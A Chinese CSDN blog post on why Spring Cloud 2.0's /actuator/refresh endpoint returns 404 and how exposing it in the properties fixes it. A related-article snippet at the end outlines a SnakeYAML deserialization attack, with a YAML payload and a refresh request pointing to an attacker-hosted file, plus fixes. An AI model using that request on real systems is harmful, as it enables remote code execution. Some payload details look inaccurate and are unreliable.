spring cloud2.0版本以后 post 访问 /actuator/health 时404问题

最新推荐文章于 2025-06-26 20:56:21 发布

原创最新推荐文章于 2025-06-26 20:56:21 发布 · 1.8w 阅读

8 ·

CC 4.0 BY-SA版权

本文介绍在Spring Cloud 2.0中如何正确配置并使用配置中心的刷新功能。解决从2.0开始无法直接通过/refresh更新配置的问题，并提供正确的配置暴露方法。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

使用spring cloud2.0.3的时候配置中心使用了git ，正常启动。

客户端去访问git上的配置文件也没有问题，同样可以取到值。

客户端整合了actuator 健康检查机制，访问/actuator/info或者 /actuator/health都没问题，

但是当想测试git配置文件修改，刷新就问题大了一直404!(/actuator/refresh)

spring boot 2.0之前都是可以直接访问的，但是2.0以后就改变了

修改之前启动日志：

修改之后启动日志:

当看到启动日志中有 refresh节点的时候说明refresh接口可以访问了！

management.endpoints.web.exposure.include 配置actuator 暴露的接入点，

默认值为health和info，此时调用/refresh会返回404错误

配置中心的更新配置的坑，2.0前调用/refresh更新配置的方法，不再适用。

现在的方法如下：

management.endpoints.web.exposure.include=refresh,health,info

把refresh接入点显式暴露出来，之后就可以通过POST 调用/actuator/refresh 来更新配置了

可以参考文档：

https://blog.csdn.net/alinyua/article/details/80009435

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

程序员_王者or青铜

关注关注

6
点赞
踩
8

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Spring Cloud(Finchley版本)系列教程(一) 服务注册与发现(eureka)

JingLisen的博客

09-06

1648

的构建工具可以使用或，但任然是主流。本文档所使用的开发环境如下：相关模块但主要有5大组件，分别为服务发现组件、、、、。但很多都弃用了，比如Ribbon等。注：版本说明提供了很多服务发现组件，比如：、、等。而是开源的服务发现组件，它包含Server和Client两部分。提供服务发现的能力，每个微服务启动时，都会向注册自己的信息(IP、端口、微服务名称等)，存储记录每个微服务的这些信息。是用于简化与交互的Java客户端。微服务启动后，会周期性地(默认30s)向发送心跳以续约自己的可用时间。如果在规定的时间内没有

Java领域Spring Cloud Actuator监控与管理

Java大师兄的博客

05-17

395

Spring Cloud Actuator是Spring Boot提供的强大监控和管理工具，旨在为生产环境中的微服务应用提供全面的运维支持。系统介绍Actuator的核心功能和架构原理深入分析各种监控端点的技术实现提供实际项目中的配置和使用最佳实践探讨监控数据的安全管理和性能优化策略本文涵盖Spring Boot 2.x及以上版本的Actuator实现，特别关注与Spring Cloud生态系统的集成。首先介绍Actuator的基本概念和核心功能然后深入分析其技术实现原理。

参与评论您还未登录，请先登录后发表或查看评论

Consul注册tomcat服务健康状态报错：HTTP GET http://node-3:8090/actuator/health: 404 Output:

qq_35008624的博客

12-18

2190

记一次Consul注册tomcat中项目健康检查错误： HTTP GET http://node-3:8090/actuator/health: 404 Output: <!doctype ht 以上的错误是因为tomcat部署后访问你的时候需要添加项目名，而健康检查的时候请求路径中没有项目名，导致报错404, 解决方案：设置tomcat配置文件server.xml，在Hos...

java Spring Boot 2 /actuator/health 返回 HTTP 404

怀着一颗学徒的心

01-17

2501

Spring Boot 包含许多附加功能，可帮助您在将应用程序投入生产时监控和管理应用程序。您可以选择使用 HTTP 端点或 JMX 来管理和监控您的应用程序。审核、运行状况和指标收集也可以自动应用于您的应用程序。该spring-boot-actuator模块提供了 Spring Boot 的所有生产就绪功能。启用这些功能的推荐方法是添加对spring-boot-starter-actuator“Starter”的依赖项。

SpringCloud相关组件——健康监控！

程序员高级码农的博客

06-26

501

使用@Endpoint注解来声明这是一个端点，并且定义了端点的ID，为了简便就不实现持久化的存储了，仅使用AtomicInteger来做请求次数的统计，提供record方法去记录请求次数，通过@ReadOperation注解提供 GET 方法的返回， Actuator 还提供了 @WriteOperation 和@DeleteOperation注解，与HTTP的方法映射关系如下。例如，统计一个通过ID获取用户的API的请求次数，先定义一个端点来做统计这件事情，代码如下。

SpringCloud健康检查404 GET "/actuator/health", parameters={} Completed 404 NOT_FOUND

weixin_43831997的博客

12-13

6094

SpringCloud健康检查404 GET “/actuator/health”, parameters={} Completed 404 NOT_FOUND 2019-12-13 16:15:45.032 DEBUG 1196 --- [nio-8891-exec-1] s.w.s.m.m.a.RequestMappingHandlerMapping : Mapped to org.spri...

spring-boot-starter-actuator访问/actuator/info报404错误

InterestAndFun的博客

03-22

4502

需要加上如下配置management : endpoints : web : exposure : include : health , info # 可以用【*】来表示开放所有的监控 info : defaults : enabled : true # info信息补充 info : app : name : test description : this is a demo。

Spring Boot 请求/actuator/beans 无法访问返回404

CSDN729180099的博客

11-09

2338

SpringBoot测试过程中访问/actuator/beans报错

SpringCloud入门——Actuator健康监控

周帅傅

02-28

5444

SpringCloud入门——Actuator健康监控一、开启监控开启Actuator只需要在pom文件中，添加actuator依赖。 <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-actuator</artifactId> </dependency> 重启服务，打开对应端口/actuator

SpringCloud2.0整合OAuth2.0

M义薄云天的博客

12-25

2422

以下是把配置文件放在Git仓库，SpringCloudConfig配置中心拉取，动态刷新一.for pom.xml <dependencies> <dependency> <groupId>org.springframework.cloud</groupId> <artifact...

Spring Cloud填坑日志(3)——Spring Boot Actuator的/pause端点使用

为梦想加油！！！

02-28

2490

背景 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;最近在学习周立大神的《Spring Cloud与Docker微服务架构实战》，在翻阅Eureka的健康检查这一部分的时候，发现有一个小备注：当eureka.client.healthcheck.enabled=true时，/pause端点（该端点由Spring Boot Actuator提供，用于暂停应用）无法正常工作，经笔者测试，发现当...

解决/actuator/路径404问题

热门推荐

苏暮沉觞的博客

03-07

1万+

在Spring Boot中配置了actuator以后，我们可以正常访问/actuator跟/actuator/health,但是查看其它的路径时，会出现404错误。原因是 /actuator/health 和 /actuator/info 是默认开放的，其他的需要自己去配置。在SpringBoot配置文件中加入如下代码即可。 management.endpoints.web.e...

spring整合actuator后，输入http://localhost:8000/health 报错 Whitelabel Error Page

weixin_43210350的博客

06-29

1163

在Spring Boot 2.0.0.RELEASE之后，所有端点默认的前缀是/actuator，所以如果想检查应用的健康状态，应该访问/actuator/health。为了通过HTTP能够访问端点，端点需要被暴露。默认情况下：只有/health和/info是暴露可访问的，只有/shutdown是默认关闭的。通过在application.properties中做如下配置可以暴露所有端点： management.endpoints.web.exposure.include=* ...

SpringBoot的actuator无法执行/refresh，报错404

MieMieFly的专栏

02-21

3853

微服务从配置中心获取配置，当远程仓库git的参数修改时，需要以post方式执行/actuator/refresh刷新配置。但是执行失败。报错404. { "timestamp": "2022-02-21T02:46:35.030+00:00", "status": 404, "error": "Not Found", "message": "No message available", "path": "/actuator/refresh" } 查看spring

Springboot 集成 micrometer（actuator/prometheus）接口报 404

Kainx

03-06

7191

Springboot 集成 micrometer（actuator/prometheus）接口报 404 解决办法

spring boot 中使用 actuator 404的问题

qq_22596931的博客

05-17

1万+

代码路径：https://gitee.com/WChengHe/tensquare_parent.git 背景：在自己写demo的时候，使用actuator的时候，查看一些端口时报404. 下图为目前启用的服务：以base服务为例，使用actuator. 按照actuator的使用方法，项目中添加actuator的依赖 pom文件依赖： <!-- add by ...

springboot使用actuator出现404 解决方案

qq_23481475的博客

05-10

4696

极有可能是因为你的服务配置了context-path，因为admin是从eureka中获取信息的，因此需要添加如下配置。 #如果配置了context-path的话，需要加上如下配置，否则会出现404 eureka.instance.metadata-map.management.context-path=${server.servlet.context-path}/actuator ...

Spring boot spring-boot-starter-actuator监控插件中端口访问404问题

The man was lazy and left no message

10-31

1813

1.项目中使用的maven插件对依赖包进行管理，在pom文件中需要添加配置,用来加载配置 <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-actuator</art...

解决springcloud访问actuator端点(refresh beans等)返回404的问题

zhiyikeji的博客

08-23

2209

在开发时遇到一个问题就是加入actuator模块之后想动态的刷新拉取远程配置的操作，可是通过/actuator/refresh检测是否有配置的更新时却发现返回404，这是由于我们没有设置springBoot2.0之后的版本将大部分的端点都屏蔽了，此时我们需要手动的去开启 management.endpoints.enabled-by-default=true management.endpoint.health.show-details=always management.endpoints.web.exp

spring cloud SnakeYAML复现

最新发布

07-10

### 漏洞概述 Spring Cloud 中的 SnakeYAML 反序列化漏洞是由于 Spring Cloud 在处理外部配置时，允许通过 `spring.cloud.bootstrap.location` 参数指定远程 YML 文件 URL。当触发 refresh 请求加载该恶意 YML 文件时，SnakeYAML 解析器会尝试反序列化其中的内容，从而可能拉取并实例化恶意 JAR 包中的类，导致远程代码执行（RCE）。 ### 漏洞复现步骤 1. **准备攻击环境** - 安装一个存在该漏洞的 Spring Cloud 版本（如旧版本未修复此问题）。 - 配置 Spring Cloud 应用程序以支持远程配置加载，确保 `spring-cloud-config-client` 依赖已包含在项目中。 - 启动应用程序，并确保可以通过 `/actuator/refresh` 端点触发配置刷新操作。 2. **构造恶意 YML 文件** - 创建一个恶意 YML 文件，利用 SnakeYAML 的反序列化特性注入恶意类。例如： ```yaml !!javax.script.ScriptEngineManager [!javax.script.ScriptEngineFactoryImpl [null]] ``` 这段 YAML 将尝试加载 `ScriptEngineManager` 并使用恶意实现类，进而执行任意代码[^1]。 3. **托管恶意文件** - 将构造好的恶意 YML 文件上传到一个可通过 HTTP 访问的服务器上，例如 GitHub Pages 或其他 Web 服务器。 4. **触发漏洞** - 使用以下请求触发漏洞，将 `spring.cloud.bootstrap.location` 设置为指向恶意 YML 文件的 URL： ``` POST /actuator/refresh Content-Type: application/json { "name": "test", "value": "http://attacker.com/malicious.yml" } ``` 此请求将强制 Spring Cloud 应用程序重新加载配置，并解析恶意 YML 文件，最终导致远程代码执行[^1]。 5. **验证漏洞影响** - 观察目标系统是否成功执行了恶意代码，例如通过反弹 Shell 或创建测试文件等方式确认漏洞利用是否成功。 ### 修复方法 1. **升级 Spring Cloud 版本** - 升级到 Spring Cloud Greenwich SR6 或更高版本，这些版本已经修复了相关的 SnakeYAML 反序列化问题。确保所有依赖项都更新至最新安全版本。 2. **禁用不必要的端点** - 如果不需要使用 `/actuator/refresh` 等敏感端点，可以在 `application.yml` 或 `application.properties` 中禁用它们： ```yaml management: endpoints: web: exposure: include: health,info ``` 3. **限制外部配置来源** - 不要允许从不可信的远程位置加载配置文件。可以设置 `spring.cloud.config.uri` 为可信的内部服务地址，避免用户自定义配置源。 4. **启用安全防护机制** - 对于生产环境，建议启用 Spring Security，限制对 `/actuator` 端点的访问权限，仅允许授权用户进行操作。 5. **使用白名单策略** - 如果必须支持远程配置加载，应实施严格的白名单策略，只允许特定域名或 IP 地址的配置源。 --- ###